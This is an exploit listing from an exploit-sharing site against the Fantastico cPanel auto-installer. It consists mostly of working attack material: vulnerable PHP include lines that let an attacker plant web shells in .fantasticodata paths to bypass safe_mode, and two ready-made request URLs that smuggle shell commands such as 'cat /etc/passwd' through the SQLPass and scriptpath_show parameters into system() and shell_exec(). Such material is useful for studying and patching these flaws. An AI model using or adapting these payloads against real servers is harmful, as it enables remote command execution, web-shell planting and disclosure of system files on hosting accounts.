Fantastico Multiple Vulnerabilities

2012-10-03T00:00:00
ID 1337DAY-ID-19496
Type zdt
Reporter RAB3OUN
Modified 2012-10-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Title: Fantastico Multi Vulnerability
#Author: RAB3OUN
# Vendor Homepage: https://netenberg.com
# Software Link: https://netenberg.com/fantastico.php
# Version:All

####################################### Bypass Safe_mode and
Disable_function  (1)
####################################################
--------
exploit in index.php
include ( "<cpanel print="$homedir">/.fantasticodata/Siteframe/$Local" ) ;
--------
Create shell in file /home/user/.fantasticodata/Siteframe/shell.php

And open http://xxxxx.com:2082/sssss/frontend/x3/fantastico/


####################################### Bypass Safe_mode and
Disable_function  (2)
####################################################
--------
exploit in index.php
   include ( "<cpanel
print="$homedir">/.fantasticodata/Mambo_Open_Source/$Local" ) ;
--------
Create shell in file /home/user/.fantasticodata/Mambo_Open_Source/shell.php
And open http://xxxxx.com:2082/sssss/frontend/x3/fantastico/


####################################### Bypass Safe_mode and
Disable_function  (3)
####################################################
--------
exploit in includes/enc_check.inc.php
         $installed_in_root_file =
"{$enc_cpanel_homedir}/.fantasticodata/installed_in_root.php";
            if ( is_file( $installed_in_root_file ) )
            {
                include( "{$installed_in_root_file}" );
            }
-------
Create shell in file /home/user/.fantasticodata/installed_in_root.php

And open http://xxxxx.com:2082/sssss/frontend/x3/fantastico/autoinstallcheck.php


####################################### Bypass Safe_mode and
Disable_function  (4)
####################################################
--------
exploit in user_email.php
    include("<cpanel print="$homedir">/.fantasticodata/user_email.php");
--------
Create shell in file /home/user/.fantasticodata/user_email.php
And open http://xxxxx.com:2082/sssss/frontend/x3/fantastico/user_email.php

#######################################  Execute Command (1)
####################################################
--------
exploit in autoinstallwordpressdo.php
$MYSQLPASS = $SQLPass;
..
...
$shellsqlimport=$MYSQLPATH. " -h " .$MYSQLHOST. " -u ". $MYSQLUSER ."
-p". $MYSQLPASS." ".$MYSQLDB." < $SQLDATA";
system($shellsqlimport);
-------------

http://xxxxx.com:2082/sssss/frontend/x3/fantastico/autoinstallwordpressdo.php?submit=Finish
installation&userdata=/home/xxxxx/.fantasticodata&SQLPass=; cat
/etc/passwd  > /home/xxxxx/e.txt;


#######################################  Execute Command (2)
####################################################
--------
exploit in includes/enc_remove.inc.php
$doremove = $scriptpath_show;
$PR = $scriptpath_show."/prepare_removal.php";
$shell_result = shell_exec( "rm -rf \"{$PR}\" 2>&1" );
if ( $Public_Settings['phpsuexec']['Status'] == "On" )
{
    $Command = "chmod -R 755 {$scriptpath_show}";
    $Output = shell_exec( "{$Command}" );
}
-----------------
http://xxxxx.com:2082/sssss/frontend/x3/fantastico/autoinstallremovedo.php?scriptpath_show=;
cat /etc/passwd  > /home/xxxx/e2.txt ;



#  0day.today [2018-04-10]  #